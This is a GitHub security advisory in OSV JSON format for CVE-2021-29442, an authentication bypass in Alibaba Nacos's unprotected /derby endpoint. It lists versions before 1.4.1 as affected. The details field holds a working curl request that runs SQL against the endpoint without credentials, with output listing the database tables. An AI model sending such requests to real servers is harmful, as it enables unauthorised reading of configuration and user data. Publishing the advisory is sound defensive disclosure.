{
  "schema_version": "1.4.0",
  "id": "GHSA-xv5h-v7jh-p2qh",
  "modified": "2021-05-10T15:11:26Z",
  "published": "2021-04-27T20:09:25Z",
  "aliases": [
    "CVE-2021-29442"
  ],
  "summary": "Authentication bypass for specific endpoint",
  "details": "The [`ConfigOpsController`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java) lets the user perform management operations like querying the database or even wiping it out. While the [`/data/remove`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L133-L135) endpoint is properly protected with the `@Secured` annotation, the [`/derby`](https://github.com/alibaba/nacos/blob/57459227863485d064ff25b3d5e24e714dcf218f/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigOpsController.java#L99-L100) endpoint is not protected and can be openly accessed by unauthenticated users. \n\nFor example, the following request will list the tables of the database:\n```\n❯ curl -X GET 'http://console.nacos.io/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st'\n{\"code\":200,\"message\":null,\"data\":[{\"TABLENAME\":\"APP_CONFIGDATA_RELATION_PUBS\"},{\"TABLENAME\":\"APP_CONFIGDATA_RELATION_SUBS\"},{\"TABLENAME\":\"APP_LIST\"},{\"TABLENAME\":\"CONFIG_INFO\"},{\"TABLENAME\":\"CONFIG_INFO_AGGR\"},{\"TABLENAME\":\"CONFIG_INFO_BETA\"},{\"TABLENAME\":\"CONFIG_INFO_TAG\"},{\"TABLENAME\":\"CONFIG_TAGS_RELATION\"},{\"TABLENAME\":\"GROUP_CAPACITY\"},{\"TABLENAME\":\"HIS_CONFIG_INFO\"},{\"TABLENAME\":\"PERMISSIONS\"},{\"TABLENAME\":\"ROLES\"},{\"TABLENAME\":\"SYSALIASES\"},{\"TABLENAME\":\"SYSCHECKS\"},{\"TABLENAME\":\"SYSCOLPERMS\"},{\"TABLENAME\":\"SYSCOLUMNS\"},{\"TABLENAME\":\"SYSCONGLOMERATES\"},{\"TABLENAME\":\"SYSCONSTRAINTS\"},{\"TABLENAME\":\"SYSDEPENDS\"},{\"TABLENAME\":\"SYSDUMMY1\"},{\"TABLENAME\":\"SYSFILES\"},{\"TABLENAME\":\"SYSFOREIGNKEYS\"},{\"TABLENAME\":\"SYSKEYS\"},{\"TABLENAME\":\"SYSPERMS\"},{\"TABLENAME\":\"SYSROLES\"},{\"TABLENAME\":\"SYSROUTINEPERMS\"},{\"TABLENAME\":\"SYSSCHEMAS\"},{\"TABLENAME\":\"SYSSEQUENCES\"},{\"TABLENAME\":\"SYSSTATEMENTS\"},{\"TABLENAME\":\"SYSSTATISTICS\"},{\"TABLENAME\":\"SYSTABLEPERMS\"},{\"TABLENAME\":\"SYSTABLES\"},{\"TABLENAME\":\"SYSTRIGGERS\"},{\"TABLENAME\":\"SYSUSERS\"},{\"TABLENAME\":\"SYSVIEWS\"},{\"TABLENAME\":\"TENANT_CAPACITY\"},{\"TABLENAME\":\"TENANT_INFO\"},{\"TABLENAME\":\"USERS\"}]}% \n```\n\nThese endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)",
  "severity": [],
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.alibaba.nacos:nacos-common"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.1"
            }
          ]
        }
      ]
    }
  ],
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29442"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alibaba/nacos/issues/4463"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alibaba/nacos/pull/4517"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-36hp-jr8h-556f"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-27T20:08:49Z",
    "nvd_published_at": "2021-04-27T21:15:00Z"
  }
}